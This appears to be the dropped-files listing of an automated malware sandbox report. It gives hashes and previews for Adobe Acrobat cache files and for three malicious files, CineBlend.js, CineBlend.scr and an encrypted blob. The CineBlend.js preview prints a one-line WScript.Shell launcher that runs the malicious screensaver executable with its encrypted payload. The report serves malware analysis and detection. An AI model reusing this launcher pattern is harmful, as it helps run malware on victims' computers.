C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.687507004325892
Encrypted:	false
SSDEEP:	24:Yv6X+BqSWzvX6pLgE9cQx8LennAvzBvkn0RCmK8czOCCSU:YvHvOyhgy6SAFv5Ah8cv/U
MD5:	5AC54C188AD9A5EA33CC32BF0BA401A8
SHA1:	4E9898FB7E7D27CB9C81DE6AA2DB0A5218FBD8DD
SHA-256:	3E1DA5AA7D53F0C351440A838CDA2BC10DBB55B1E20F90736F52AF20C7AE9529
SHA-512:	A7EC81CDFDD4519B04526D5311AEDCA3283A3C95E4EE4C1BA1A9C6E48B94F6866873AABEBDCDF9D2DC55CFCDB117C4D8F3FE6F39D4A50EB5126801DEA7C84E5F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.299363429264348
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJf8dPeUkwRe9:YvXKX+B6BcN1EZc0vXVGU8Ukee9
MD5:	1D33FA519C2823E9545D86911952088D
SHA1:	C034F42F81691545269EC54981089827A04E5EB3
SHA-256:	E405AAF9B9D52898ED7D64D837D0D94FF54AC16837D8CEC80889F5344811CAD7
SHA-512:	5A64D7080FA95D12D6525F4203BAC5BF36C26ED3B462BE12CBADE671786FE24189D1E32335E5E8CBDB0BF2B67AEA71C4ED62AC1F6A2B4335BC3556BC2F5B982D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.303852203789734
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJfQ1rPeUkwRe9:YvXKX+B6BcN1EZc0vXVGY16Ukee9
MD5:	0D990F25937864324197DE8B9FD88F84
SHA1:	2DE50621BCB721D9F48BAC1CECBF274470C3572F
SHA-256:	2B1BA786CFEAF3F823ED61D7E9F7630A6D1C38CF50FA3B74527E6C9080716AC1
SHA-512:	9FE0E2070D4A201D0F8C471EE7302BC20332C7BDBDEE60BD011272322E2013EEA7581AE284D31B4D0625D35D0A5D9C559F79FCDBBB730F282769CE787E2CB2F0
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.306774759815385
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJfFldPeUkwRe9:YvXKX+B6BcN1EZc0vXVGz8Ukee9
MD5:	6BC6C4A8B64E31C1F885BC7F66D1931A
SHA1:	0F012A2FDCAF3B8C89466CC8F3FC0D35187293A1
SHA-256:	15E557ECE7EFBA5616BE0EE26BA58AF1E4D1D4887769BD773074E5F6FD544994
SHA-512:	B323A3D7060B13BF3A400FD5CB5092849F79F149FC0507DE7494C61FEE7EF702BD32C2C3A62653D3AF799467375E472FADF92471FD88AE1D6DA5630E400E83D6
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.323877147353879
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJfzdPeUkwRe9:YvXKX+B6BcN1EZc0vXVGb8Ukee9
MD5:	1FC227B224F560AC70185C143B1FA0DD
SHA1:	59AEFBE56AB38FF9D8BAFB6899B78BC4C3420AFF
SHA-256:	5FF99CAFE7B24CB4026B3A83FFFB53B0D8EF66B655F3CBCA8946667AABACA661
SHA-512:	48ADCF2C3E505D2E582BFB4D315CDB392548D4A2EF1C5C75DAE2D7D2E994EE8DB939D9AE7193C3DDAD5AE1BC56386123A3878EEB770FD564B64022E33A951926
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.304892074083872
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJfYdPeUkwRe9:YvXKX+B6BcN1EZc0vXVGg8Ukee9
MD5:	0307C5664981CD19FBB7312782FC82EA
SHA1:	273ABA831118729466EE0AF39DEF66C80C8794A2
SHA-256:	E38287FAEF26A2B7396483B64DF2B4F335F6C534D672AEB5A4C79B6542E3C282
SHA-512:	990DCC366529E8D49EEA6E5E2BAC826E88F4AA184B0ACD3644E3C9AD8E02EAF1EFCB8000CC495EBF29493FA6590B635A0E6CE07722751DA8853D121BF4A19983
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.291028574971603
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJf+dPeUkwRe9:YvXKX+B6BcN1EZc0vXVG28Ukee9
MD5:	58BB2561A2A6C8CA2D75D9E362ABCBB3
SHA1:	3BD8C2EF8486E2DA64EA7C35D9391A4E77B9EB77
SHA-256:	0967007DD521E941781BABE15487298655BC6768404710EE65E6F682A884EE7D
SHA-512:	932883045F3A3BC754F8273894C48924925E20751EB24024FDED3C9020B08B73374B903B0277073E5757A4693A3D02848701965DF22B57FB060BCAC0EC63E79D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.288405549255441
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJfbPtdPeUkwRe9:YvXKX+B6BcN1EZc0vXVGDV8Ukee9
MD5:	C03A6185F58EA4ADA8640AAA9DC3747F
SHA1:	92AAF3B5C6BA536848EB4727E33B1C361C97246B
SHA-256:	1BB2F5C45EF2AADEB07FE56821D211E875E9F65600D198E0327EA66E23585A12
SHA-512:	9B9C1F0F02E7803A4B433477A15093188E3EE523EE37167DEB4D0C281764C46D1E344BEA1333243612179C569C238E76B6B68B3A8CBA125C7AE904565D826FA1
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.293420581089492
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJf21rPeUkwRe9:YvXKX+B6BcN1EZc0vXVG+16Ukee9
MD5:	4F4B4C2CA3F762499AA93BFFBBFE3D71
SHA1:	7E1E3DFA50562FC388EAF4A5FF898CA32EE94A99
SHA-256:	E7EEFDF20F187DEAF534696368516CB5666D8A1A6CDB1630E67A84FC579117D2
SHA-512:	F35B7FD6E2D2F2AB658F52EAF427E317A028D3949EE6781A93A352E6816F6C33F5D36E08BCC728D6EED1953621261E48B8BF5BC615BECDFAE80B1F486D4F0AB3
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.663413165027715
Encrypted:	false
SSDEEP:	24:Yv6X+BqSWzvXmamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSoY:YvHvOwBgkDMUJUAh8cvMF
MD5:	F399B08D29BE543C17FE883B8971BCC1
SHA1:	F39143822D32FA961798A477101D8094DE81196B
SHA-256:	CC0F09D34171F2AAAB2F51AED32DD31D0456B07B7F472BB4239EFA239F9C868D
SHA-512:	A5975C92F037AB99AE26CEA0A4BA26DD6B85AF08C6D5666CF739C487BC85B6767D5D78AA2D50CFB981C420AB1898ABE1C406DB32E65706FC4C42A85DFBC0D1CD
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.267641718201813
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJfshHHrPeUkwRe9:YvXKX+B6BcN1EZc0vXVGUUUkee9
MD5:	32DBE14EB0F3D0739EC7B5CC95E9F878
SHA1:	311FD0415EE6FDF4D9A5BF17E9C6478FC0FA0F7E
SHA-256:	CDF75AC581956FF2411FA02F0E3A4E3D2F73CD8D169479F8D881F57E315F1D17
SHA-512:	657FDC7605A2B51AE3267FA8B6268C2D530CDADC70CEBDA8766FBCDFB50BAB1AB9BD70B651CB0046AA9C34F118193EACCA085158FCDBC484B4DC334836B351FD
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.274276123561234
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJTqgFCrPeUkwRe9:YvXKX+B6BcN1EZc0vXVGTq16Ukee9
MD5:	CADEA2843D0A83EE71CF39C8EDF00847
SHA1:	15CC2CDBA9BCA060288D00756B2BC3F5AF838DAF
SHA-256:	7E13D536C7714DD3A63F46ADFCEF2B26872A95D17D7BC66AB71B90F2E6720D7F
SHA-512:	77F080D4BA7AD6895E7329266D617E98E5476CB30C98010A54DCF855F5F26CA55AF49BAA0F8C9F3CB7263D4BDBDC62F7FA90E9B44E18F344A15A389551D81288
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.14014307933672
Encrypted:	false
SSDEEP:	24:YPAxFD9aJayEtQnYcASkJBGL2sJD2NujAWqvj0SG6a2ftV2LS4CJ3Fv3wsVF5p9d:YIxDzjJmJD2WAW4MCtVqs3FvAIb9CVO
MD5:	94BB789CDE9105B8D73A746861B366C1
SHA1:	12D16F2D85C829B2B6DD134CB5589D11D0880843
SHA-256:	52326507B5A826203F4C98624F1CD927B1BFE49E889734EBEC9B417B58A05F39
SHA-512:	B405EE9FF374112C46243C4871F35ABA1F8F896336608AEF750D49FB0FC87CD06DC6AB28444CAB9BF50122938583EA8497DDD741AA3DFDD88F44C96B7915D73C
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"c383c8f1770f75ee501edc3d8038e33f","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736042588000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"2906b4481c87853edb5c2b771b731c5c","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736042588000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"f57f5be61f8b73bc51a35b2123f67a12","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736042588000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"520104f0b6203e2476c1ac923ddbc8b0","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736042588000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"f51fe23fd72ee2199739d8f9b2c31e10","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736042587000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"04c8b755eab3e26abfa774613a8dd854","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.1880742425039086
Encrypted:	false
SSDEEP:	48:TGufl2GL7msEHUUUUUUUUaXSvR9H9vxFGiDIAEkGVvp+X:lNVmswUUUUUUUUI+FGSItm
MD5:	5833ACDA423E4C21D1A4A787616C5FD4
SHA1:	A79C2A2545903811E08E9A5605241219054C9D3A
SHA-256:	162E017DBB0F1C7B6F8B5DE3B62F6A37F8128E42CEC962B8CE0BFCDF0071F51B
SHA-512:	2A4F02E46719D75A907F51E1AE2F68CAB06ADC9D4F4EA6EB5EB50575575A5D43BE60FFE65DACB90B40823DB97C42AF4088DFCC568724F4E4AB1030CD117836EB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.6063505879589195
Encrypted:	false
SSDEEP:	48:7MLKUUUUUUUUUUaLvR9H9vxFGiDIAEkGVv8pqFl2GL7msn:7dUUUUUUUUUU2FGSItupKVmsn
MD5:	91574ED8D72DA8438845F2841928F6A4
SHA1:	DBBEAB6245B583755AAE8067FCCD4B548F174518
SHA-256:	DE7B430962B312C11D4346DFED4BF2D22ED72E0FE0CE1BE77BFBEBACE261FCFD
SHA-512:	30B0FCA20F3D52CFCF1D2A50FE85E442A8B616007B5AC6A7B4E40A9936D0BB1F95857F30F74FAC46013E685BABCFF8EF303FC58A897792E9CEFF073E77D7CB90
Malicious:	false
Preview:	.... .c.....x.n2......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgSG9CoTAANl6ng72nGOXDrY7Yyu:6a6TZ44ADESG91TAalDj/K
MD5:	331C1B58662FE90DBFA288A92DF3044B
SHA1:	E8896AED941754DCAE2793DC96DBCE0EA3E11C98
SHA-256:	F418391EBB9FE01650BE8EBAD128EEBE443C4C00858EE6843E626AB667F427C5
SHA-512:	5F9D19FDB7E6E6A63763AD8C5E93BE1FE7F0F19F5D9164FD713DEB57B49B0407E1DDC8948AA836E00BBE89BBA31367EC270428F7A24D42AEFF902B467CD1B1E3
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	194
Entropy (8bit):	4.728961865655362
Encrypted:	false
SSDEEP:	6:RiJBJHonwWDKaJkDvNLMqL9WiywWDKaJkDvNL85M:YJ7QjWaK9L9W7WaK5
MD5:	E374DEE0980665B0A43DADD9532DF501
SHA1:	7AC2B7572365CF8873C2DE28E71E051AD96C9ACE
SHA-256:	56091AD9541CBC140D3E0F929A25E3E46DC949B6CD5D90EAE45160D641F6C9D2
SHA-512:	F2B73100CFEC0844A14E598448A707EBD912594328092F2A7744D9D63EEE1985EBF69D6821D4FAC049FE88E5204E5869AC170095A955F13D246DABF4CD57E03E
Malicious:	true
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\MediaFusion Technologies Inc\\CineBlend.scr\" \"C:\\Users\\user\\AppData\\Local\\MediaFusion Technologies Inc\\s\"")

C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: c2.hta, Detection: malicious, Browse Filename: RisingStrip.exe, Detection: malicious, Browse Filename: Active_Setup.exe, Detection: malicious, Browse Filename: CenteredDealing.exe, Detection: malicious, Browse Filename: CenteredDealing.exe, Detection: malicious, Browse Filename: over.ps1, Detection: malicious, Browse Filename: MatAugust.exe, Detection: malicious, Browse Filename: 6684V5n83w.exe, Detection: malicious, Browse Filename: vlid_acid.exe, Detection: malicious, Browse Filename: AquaPac.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s

Download File

Process:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
File Type:	data
Category:	dropped
Size (bytes):	733484
Entropy (8bit):	7.999727303580045
Encrypted:	true
SSDEEP:	12288:7EjETXeEPYtANOcxShg6LO5mrcPIez2EsXwEA0cIYJU9YoULsEpW2bhhbaIkJflE:7EE9Iln+6LcmoPIezgAv0JioULJpph93
MD5:	C82D57C04AAD2BD54DFEED7CBFEE8ECB
SHA1:	C564CFCA3BCC3A26128917C94AB4E44F9CD25BBE
SHA-256:	4E285732BD17A06AE4BE71BEAAD8E5CE4DBD211F2888B4571D5D0C716764C767
SHA-512:	9D3102EFB33D4B5A510D24D1B7F313C66CB502B6B7572EF2C10538D3B48B8D63D7CAD41E5B9596181B142A7FDFD27727C6541A55307B4C4F793B957ACD7ECEDB
Malicious:	false
Preview:	.....#.<....d.Dm{R..fR.@^..J"..H$.\|...H.[.....#W..br'..Y.$y.l...wFU..9..aQ8.r...e...H(..y..'...u/(..c.!$..x.\z..g.d.j.....xe.J><5...S=&....L.'.D\Nm..N.....k.L..b D.".<)\_.t.....4.s.6...o=.Y....c..!T.D..aI.0.x.vC.Q,.].I^...E.5....`..y...y..!.d7..n....FW.....IO..c.D..\|.-Q.C'.#.`.))..:..@~.j.L/9.Z~........0..:Q. %..).w%.l)...5%..l..7q.....F0.T..>GU..P.DA.]..f......BMv$.g2g<u.....O...../.0N...c..H.%........Q.....&@p...OE..R..:.g....p'.Y.+.^..............k.1..".S.....>.A.4^.....9..).=?`....]..:.nF.....Ty.k..t..lK..^.....:E...u-_.1&T<...p.._..a..u..{g....4..fF,.:%...../..T&.......hB;.......3'.<p".u..7.ju...c.f(pTp.I./...r,.X.....f...........I...E.'pji.d....B.N<..P..5p.q]...:.1Xj.:.>.E..J..l.Z.H!r'hJ....".(.S...`..AIe.b&B..p....#.. 6..2...#.....D.(.X.AZ...%8;b..~*K..d.ja0..n..jU8.G.8.u..3....h.g.LB...._".&{...ggaF..X.0..u]..#...g6+..GR.i.?..Y.( Lv..0.........1<..<...$.'......l.).....]....}(..(.q...fJp..9,....U...@....e..-....WJv]..C1u

